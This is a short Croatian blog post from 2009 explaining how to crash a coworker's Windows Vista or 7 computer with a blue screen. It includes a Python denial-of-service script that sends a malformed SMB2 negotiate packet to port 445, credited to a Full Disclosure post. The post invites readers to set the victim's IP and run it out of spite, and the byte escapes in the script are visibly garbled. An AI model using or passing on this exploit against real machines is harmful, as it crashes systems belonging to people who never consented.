Red Moon D Watch

utorak, 08.09.2009.

Kako srušiti bilo koje Vista/Windows 7 računalo bez suvišnih zašto?

Kolega s posla vas pod.ebava? On na svojem kompjuteru ima Vistu ili čak Windows 7 i smije se vama koji ste na XP-u ili nedaj bože Linuxu, Macu?

Srušite mu računalo, obojite njegov screen u plavo. Uz pomoć malo koda. IP adresu u kodu zamijenite IP adresom njegovog kompjutera. Morate imati instaliran python jer je kod koji slijedi u pythonu. Možete ga pokrenuti s bilo kojeg OSa.


#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA from socket import socket
from time import sleep
from socket import socket

host = "192.168.1.252", 445
buff = (
"x00x00x00x90" # Begin SMB header: Session message
"xffx53x4dx42" # Server Component: SMB
"x72x00x00x00" # Negociate Protocol
"x00x18x53xc8" # Operation 0x18 & sub 0xc853
"x00x26"# Process ID High: --> :) normal value should be "x00x00"
"x00x00x00x00x00x00x00x00x00x00xffxffxffxfe"
"x00x00x00x00x00x6dx00x02x50x43x20x4ex45x54"
"x57x4fx52x4bx20x50x52x4fx47x52x41x4dx20x31"
"x2ex30x00x02x4cx41x4ex4dx41x4ex31x2ex30x00"
"x02x57x69x6ex64x6fx77x73x20x66x6fx72x20x57"
"x6fx72x6bx67x72x6fx75x70x73x20x33x2ex31x61"
"x00x02x4cx4dx31x2ex32x58x30x30x32x00x02x4c"
"x41x4ex4dx41x4ex32x2ex31x00x02x4ex54x20x4c"
"x4dx20x30x2ex31x32x00x02x53x4dx42x20x32x2e"
"x30x30x32x00"

)
s = socket()

s.connect(host)
s.send(buff)
s.close()



IZVOR: http://seclists.org/fulldisclosure/2009/Sep/0039.html

- 18:18 - Komentari (0) - Isprintaj - #